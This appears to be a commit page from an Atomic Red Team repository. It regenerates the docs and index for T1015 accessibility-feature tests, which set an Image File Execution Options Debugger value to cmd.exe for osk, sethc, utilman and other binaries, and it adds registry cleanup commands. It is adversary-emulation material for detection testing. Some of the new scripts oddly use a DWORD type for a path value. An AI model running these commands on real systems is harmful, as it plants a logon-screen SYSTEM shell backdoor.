security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=master

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2020-01-06 21:07:55 +00:00
parent 7065f37725
commit 23285cf6cb
2 changed files with 353 additions and 70 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1015/T1015.md
+119 -14
View File
@@ -48,12 +48,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | osk.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
```
<br/>
<br/>
@@ -69,12 +84,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | sethc.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
```
<br/>
<br/>
@@ -90,12 +120,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | utilman.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
```
<br/>
<br/>
@@ -111,12 +156,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | magnify.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
```
<br/>
<br/>
@@ -132,12 +192,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | narrator.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
```
<br/>
<br/>
@@ -153,12 +228,27 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | DisplaySwitch.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
```
<br/>
<br/>
@@ -174,11 +264,26 @@ This allows adversaries to execute the attached process
|------|-------------|------|---------------|
| target_executable | File You Want To Attach cmd To | String | atbroker.exe|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d "C:\windows\system32\cmd.exe" /f
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
```
#### Cleanup Commands:
```
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
```
<br/>
atomics/index.yaml
+234 -56
View File
@@ -178,11 +178,23 @@ persistence:
type: String
default: osk.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -197,11 +209,23 @@ persistence:
type: String
default: sethc.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -216,11 +240,24 @@ persistence:
type: String
default: utilman.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -235,11 +272,24 @@ persistence:
type: String
default: magnify.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -254,11 +304,24 @@ persistence:
type: String
default: narrator.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -273,11 +336,24 @@ persistence:
type: String
default: DisplaySwitch.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -292,11 +368,24 @@ persistence:
type: String
default: atbroker.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
/f
'
T1098:
@@ -12754,11 +12843,23 @@ privilege-escalation:
type: String
default: osk.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - sethc
@@ -12773,11 +12874,23 @@ privilege-escalation:
type: String
default: sethc.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
'
- name: Attaches Command Prompt As Debugger To Process - utilman
@@ -12792,11 +12905,24 @@ privilege-escalation:
type: String
default: utilman.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - magnify
@@ -12811,11 +12937,24 @@ privilege-escalation:
type: String
default: magnify.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - narrator
@@ -12830,11 +12969,24 @@ privilege-escalation:
type: String
default: narrator.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
@@ -12849,11 +13001,24 @@ privilege-escalation:
type: String
default: DisplaySwitch.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger
/f
'
- name: Attaches Command Prompt As Debugger To Process - AtBroker
@@ -12868,11 +13033,24 @@ privilege-escalation:
type: String
default: atbroker.exe
executor:
name: command_prompt
name: powershell
elevation_required: true
command: 'reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image
File Execution Options\#{target_executable}" /v "Debugger" /t REG_SZ /d
"C:\windows\system32\cmd.exe" /f
command: |
$registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
$Value = "C:\windows\system32\cmd.exe"
$Name = "Debugger"
IF(!(Test-Path $registryPath))
{
New-Item -Path $registryPath -Force | Out-Null
New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType DWORD -Force
}
ELSE
{
New-ItemProperty -Path $registryPath -Name $name -Value $Value
}
cleanup_command: 'reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger
/f
'
'':